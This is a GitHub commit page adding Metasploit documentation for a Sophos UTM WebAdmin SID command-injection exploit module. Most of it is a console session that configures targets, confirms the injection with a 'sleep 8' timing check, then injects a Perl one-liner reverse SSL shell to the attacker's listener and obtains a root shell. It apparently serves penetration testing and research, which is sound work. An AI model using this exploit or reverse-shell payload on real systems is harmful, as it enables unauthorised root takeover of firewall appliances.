-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
74 additions
and
0 deletions.
There are no files selected for viewing
74 changes: 74 additions & 0 deletions
74
documentation/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,74 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| ### Setup | ||
|
|
||
| Follow the [official instructions] from Sophos. | ||
|
|
||
| [official instructions]: https://docs.sophos.com/nsg/sophos-utm/utm/9.707/help/en-us/Content/utm/utmAdminGuide/Installation.htm | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| Follow [Setup](#setup) and [Scenarios](#scenarios). | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ### Sophos UTM 9.510 | ||
|
|
||
| ``` | ||
| msf6 > use exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection | ||
| [*] Using configured payload cmd/unix/reverse_perl_ssl | ||
| msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > options | ||
| Module options (exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection): | ||
| Name Current Setting Required Description | ||
| ---- --------------- -------- ----------- | ||
| Proxies no A proxy chain of format type:host:port[,type:host:port][...] | ||
| RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit | ||
| RPORT 4444 yes The target port (TCP) | ||
| SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. | ||
| SRVPORT 8080 yes The local port to listen on. | ||
| SSL true no Negotiate SSL/TLS for outgoing connections | ||
| SSLCert no Path to a custom SSL certificate (default is randomly generated) | ||
| TARGETURI / yes Base path | ||
| URIPATH no The URI to use for this exploit (default is random) | ||
| VHOST no HTTP server virtual host | ||
| Payload options (cmd/unix/reverse_perl_ssl): | ||
| Name Current Setting Required Description | ||
| ---- --------------- -------- ----------- | ||
| LHOST yes The listen address (an interface may be specified) | ||
| LPORT 443 yes The listen port | ||
| Exploit target: | ||
| Id Name | ||
| -- ---- | ||
| 0 Unix Command | ||
| msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set rhosts 172.16.57.254 | ||
| rhosts => 172.16.57.254 | ||
| msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set lhost 172.16.57.1 | ||
| lhost => 172.16.57.1 | ||
| msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set verbose true | ||
| verbose => true | ||
| msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > run | ||
| [+] perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"172.16.57.1:443",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}' | ||
| [-] Handler failed to bind to 172.16.57.1:443 | ||
| [*] Started reverse SSL handler on 0.0.0.0:443 | ||
| [*] Running automatic check ("set AutoCheck false" to disable) | ||
| [*] Injecting command: sleep 8 | ||
| [*] Elapsed time: 8.052319 seconds | ||
| [+] The target appears to be vulnerable. Successfully tested command injection. | ||
| [*] Executing cmd/unix/reverse_perl_ssl (Unix Command) | ||
| [*] Injecting command: perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"172.16.57.1:443",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}' | ||
| [*] Command shell session 1 opened (172.16.57.1:443 -> 172.16.57.254:49901 ) at 2021-10-21 00:48:51 -0500 | ||
| whoami | ||
| root | ||
| ``` |